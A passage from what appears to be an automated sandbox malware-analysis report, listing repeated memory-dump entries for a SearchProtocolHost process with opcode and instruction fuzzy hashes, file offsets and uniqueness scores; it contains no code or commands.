                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27385c0624eea25996b21e602c39ad06e921a5a6e93f095b2e8f2e0a5e164d13
                                                                                      • Instruction ID: 54252b8bab6fb4a399827483afc4b3d9224d40a06f40d65a4b9709e5aed82750
                                                                                      • Opcode Fuzzy Hash: 27385c0624eea25996b21e602c39ad06e921a5a6e93f095b2e8f2e0a5e164d13
                                                                                      • Instruction Fuzzy Hash: FBC165B99007089FEB15DFA9D840AAEBBF4FF48710F15426AE51AEB350E734A901CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2dd675b0c6bfbfdabc9bda405f958b8a10d01f7e0a007b99905a689deff5a04
                                                                                      • Instruction ID: 719aef956f9aa978d738ae1073b3820cd7c5202287d4a0ed6a3146aaac49773b
                                                                                      • Opcode Fuzzy Hash: a2dd675b0c6bfbfdabc9bda405f958b8a10d01f7e0a007b99905a689deff5a04
                                                                                      • Instruction Fuzzy Hash: 0CC13974208340DFE764CF19C494BAAB7E4BF88344F484A6EE99997391D774E904CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da4f2952b80b239b31fb53f7f58281416f37655cf2e61afc89298f4b7f3b1ea4
                                                                                      • Instruction ID: bf1beb5cc9387688c04dd7ea1e33786d45b135cc6ba7e31344ed481850193b45
                                                                                      • Opcode Fuzzy Hash: da4f2952b80b239b31fb53f7f58281416f37655cf2e61afc89298f4b7f3b1ea4
                                                                                      • Instruction Fuzzy Hash: 49B17075A402668BDB75DF64C890BA9F3B5EF44700F1485EAD50AEB280EB349EC5CF21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 483bd74e88842aee7c1a8034ccd40f2fb3f73e4f683997768ade8a2deb4abf3c
                                                                                      • Instruction ID: 36eec87fd7269c7640c7a60381884346e371ae2822f17f6efaaebf69c99d456e
                                                                                      • Opcode Fuzzy Hash: 483bd74e88842aee7c1a8034ccd40f2fb3f73e4f683997768ade8a2deb4abf3c
                                                                                      • Instruction Fuzzy Hash: CFA1C871E00715AFEB21DBA8D888BEDB7B4BF05B18F090255EA11AB790DB749D40CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad67e1058e67c9ed2f5dec7f0e1bca4e271c62bba374ecc43a8c2aa2547d43ad
                                                                                      • Instruction ID: 3da554651f41ecbdff6c3ddb5e249ef02e470771bab5993cf70bfc414dd4632d
                                                                                      • Opcode Fuzzy Hash: ad67e1058e67c9ed2f5dec7f0e1bca4e271c62bba374ecc43a8c2aa2547d43ad
                                                                                      • Instruction Fuzzy Hash: 91A1DF74B01B069FDB24DFAAC990BAAB7B5FF48314F04506DE905DB291EB34E901CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8d9ce51f9da3b21499a057d7e5fe88c22603ab6a743d7434d0a1303cb79e3753
                                                                                      • Instruction ID: 7c3bf5f3b12aabbd7a4dcc2f346f4d71c6bb891eaa00b6f62ae111f98dfb6238
                                                                                      • Opcode Fuzzy Hash: 8d9ce51f9da3b21499a057d7e5fe88c22603ab6a743d7434d0a1303cb79e3753
                                                                                      • Instruction Fuzzy Hash: 15A1CA72604A11AFC721DFA9C980F5EB7E9FF88704F480AA8E589DB651D734EC41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72a362677bedc2b08b394968e448d5ddd536b7fd87cbd47eb2ac321641897f24
                                                                                      • Instruction ID: 5e2399297e916e4a4a7bf1121d354c620cf1bbe039b763d89ed5775519304273
                                                                                      • Opcode Fuzzy Hash: 72a362677bedc2b08b394968e448d5ddd536b7fd87cbd47eb2ac321641897f24
                                                                                      • Instruction Fuzzy Hash: C2910135A00A14CFD724DB6CC884B7EB7B5FBC8710F1942A9EA059FB80E7349941DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b898720688f9f3192da0821627ce289a825e5a3eec3feb8056d0f6142bbff867
                                                                                      • Instruction ID: cded63570d46db825529cd2cab187ff03dec963522605f170a55953bbd5399e9
                                                                                      • Opcode Fuzzy Hash: b898720688f9f3192da0821627ce289a825e5a3eec3feb8056d0f6142bbff867
                                                                                      • Instruction Fuzzy Hash: B0B18B75900606CFFF25DF59E4407AAB7B4BF0A314F18469EDA219B2A6D730D842CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb101c374379b0ea2f71a98d027c3869e48d95305f1f765d1e3ecd8d80b4ced4
                                                                                      • Instruction ID: 1e3fc932ab62fe8910743ebbe51a9289e0ff29ab65d1989f2a369f739e605d4a
                                                                                      • Opcode Fuzzy Hash: fb101c374379b0ea2f71a98d027c3869e48d95305f1f765d1e3ecd8d80b4ced4
                                                                                      • Instruction Fuzzy Hash: BA510F34A10609EFEF19DF68D8887BDB7B9BF44315F1442AAE5029B390DB74D911DB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97a442ca310a420623df8722d7fe3f2e304ddf039c2609459843c213f8626c21
                                                                                      • Instruction ID: d24500f9f2543ec1b1acb0b1b8ff5c46b5a8cd36574571b17c85286def69508d
                                                                                      • Opcode Fuzzy Hash: 97a442ca310a420623df8722d7fe3f2e304ddf039c2609459843c213f8626c21
                                                                                      • Instruction Fuzzy Hash: B341E3357017259BDB29DBA9C894B7BF79AEF84660F0882DAFC15CB290DB34D801C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60fcee8ed8f72312891488347e66f21343bb338e1c702b9ffad42b9a9214c549
                                                                                      • Instruction ID: c71e9ae81ccada9df0f20a35665a42ff62d51fcd4c2c93a1e0e743c9e19893c3
                                                                                      • Opcode Fuzzy Hash: 60fcee8ed8f72312891488347e66f21343bb338e1c702b9ffad42b9a9214c549
                                                                                      • Instruction Fuzzy Hash: B4518FB1A013259FFF22DFA8D844BADB3B4BB0A764F14025AE901FF351D774A9408B51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 84692a3bacfe1de9148dedec055eafe61e75df66176451a2de03c40567b2b6a7
                                                                                      • Instruction ID: 451a7d631d27687be06b66830319894169fd0f54b26f2066fe218e66fd7aee23
                                                                                      • Opcode Fuzzy Hash: 84692a3bacfe1de9148dedec055eafe61e75df66176451a2de03c40567b2b6a7
                                                                                      • Instruction Fuzzy Hash: 02412375690B45ABCB94FFAC9C85B7A7764EB44704F0004ADED16EF281E7719901C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c97196c013495471bf058e18471a8d9ec1789ada60b4918689687285dff22b1
                                                                                      • Instruction ID: d7ef0730bb357ca06b661c99e87cd1dd73dca99855659cf5adaa0e87b7a71642
                                                                                      • Opcode Fuzzy Hash: 3c97196c013495471bf058e18471a8d9ec1789ada60b4918689687285dff22b1
                                                                                      • Instruction Fuzzy Hash: F8516D75200606EFCB15CFA4C584A56FBB9FF45305F1981EAE809DF261E3B1E945CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 832f466dce9ef88482f2b55d4e70f37a93f1888f8b68d68dcb5ba0b8a771ae4f
                                                                                      • Instruction ID: 9eca5acf2e0681bdf8997078ce8c6789321571003edd7ffb0297df26dd584165
                                                                                      • Opcode Fuzzy Hash: 832f466dce9ef88482f2b55d4e70f37a93f1888f8b68d68dcb5ba0b8a771ae4f
                                                                                      • Instruction Fuzzy Hash: 2841AA7A921298DBCB14DF98C440AEEF7B4BF48708F18826EE815EB250D735DD41CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                      • Instruction ID: dbe2eede41799edf48e8c3d517930850b0698158d2a18b7a7eba6cb86e5c8a02
                                                                                      • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                      • Instruction Fuzzy Hash: 84515C75A00619CFCB58CF98C880AADF7B5FF84714F1881A9D815E7390D735AE41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2480402846f28d7f1c22e25e44a937f9e94cf11ebac50117ffa337a3f64c122e
                                                                                      • Instruction ID: 59451d69c245d83e3de963c9bf279259d30d4b80c464b2dc12df93d49d0781ad
                                                                                      • Opcode Fuzzy Hash: 2480402846f28d7f1c22e25e44a937f9e94cf11ebac50117ffa337a3f64c122e
                                                                                      • Instruction Fuzzy Hash: C051C074A40606DBDF29DB28CC44BA9B7B5AF01324F1883EAD2599B3C2E7749981CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4362577b60c1958e1845ecfbd70fadca5b9492ea8b450dd571be0fabf4c7bff1
                                                                                      • Instruction ID: 8738f05b3bab4c206c107d795bc5c4895c4fc73b3f69fe4ab635a82a3a64e925
                                                                                      • Opcode Fuzzy Hash: 4362577b60c1958e1845ecfbd70fadca5b9492ea8b450dd571be0fabf4c7bff1
                                                                                      • Instruction Fuzzy Hash: D341CCB4A80702EFDB22EF68C894B6ABBF8EF44754F0444A9E542DF650E770D901CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                      • Instruction ID: bd7baa35c7536eede81460d04ead16c42bc0687d982c927ba83b005ed2e58fe1
                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                      • Instruction Fuzzy Hash: 9A417575B00215ABDF14DFE9C894AAFBBBAEF88650F1840AABC15E7341D670DE01C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e104074feef1d1663d90936171f17486329b74f65ff533eb7469598b92ae0419
                                                                                      • Instruction ID: 3da4bb420b9b4211e3442c96428414434dc98650320d5549665e680c06c3d3f3
                                                                                      • Opcode Fuzzy Hash: e104074feef1d1663d90936171f17486329b74f65ff533eb7469598b92ae0419
                                                                                      • Instruction Fuzzy Hash: 3D418F71610B019FEB28CF68E884A22B7F9FF48314B144BAED5578BA51E730E855DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bf7f934c31eb5299b90530ad8bbd07cd0477f227203344e8cfd72b76230cb0e
                                                                                      • Instruction ID: ce1a3490b7fd2cdc0973c8534b0f9ffcb6454168cc2fca10753df7e26e43be43
                                                                                      • Opcode Fuzzy Hash: 4bf7f934c31eb5299b90530ad8bbd07cd0477f227203344e8cfd72b76230cb0e
                                                                                      • Instruction Fuzzy Hash: B5418B36A44605CFCB65EF6CD494BEDB7B0FF48320F1801A9D811AB295DB349940DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd3e4d1a4b377ceafcf1aedafbf1550e0b4b7163cf049112484abb0534377215
                                                                                      • Instruction ID: 76978f41ccc4413789061de6ae0a41a5fe751d08e4588b1929e836cc9635fac5
                                                                                      • Opcode Fuzzy Hash: fd3e4d1a4b377ceafcf1aedafbf1550e0b4b7163cf049112484abb0534377215
                                                                                      • Instruction Fuzzy Hash: E341937A100745DFD320FF69D984F6AB7B8FB85360F04066DEA158B251DB31E811CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                      • Instruction ID: d06586396ffbeca3b97b021662a227316606eebef5fc4bffefe42112dad7b538
                                                                                      • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                      • Instruction Fuzzy Hash: 32411975A10745EFCB24CF98C980AAAB7F8FF48700B10496DE556EB651D730EA44CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c043cad1f73fb91eea88fcec09bb29597a61a9d6f7120f7ba178f41daff8017
                                                                                      • Instruction ID: 36e3d26218ab4b6703c869ba13c6eced84fafc38ef9ef1cf3014b56182a3a4f1
                                                                                      • Opcode Fuzzy Hash: 6c043cad1f73fb91eea88fcec09bb29597a61a9d6f7120f7ba178f41daff8017
                                                                                      • Instruction Fuzzy Hash: 7741DF756047018BD325EFA8C884B2AB7E6EBC4354F0849ACFC86CB3A1EB34D849C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59529c00304946b3e9e47906c77a8e309a6e049695e4fb068939bbcd38e05242
                                                                                      • Instruction ID: 4e12ef447a96c7e8c4172259f479cd244dc0378c7708144f364fd3ebd42bf7f0
                                                                                      • Opcode Fuzzy Hash: 59529c00304946b3e9e47906c77a8e309a6e049695e4fb068939bbcd38e05242
                                                                                      • Instruction Fuzzy Hash: 3941AD74501708EFDB24FF24E940B59B7F5FF48314F248ADAC10A9BAA2EB30A941CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
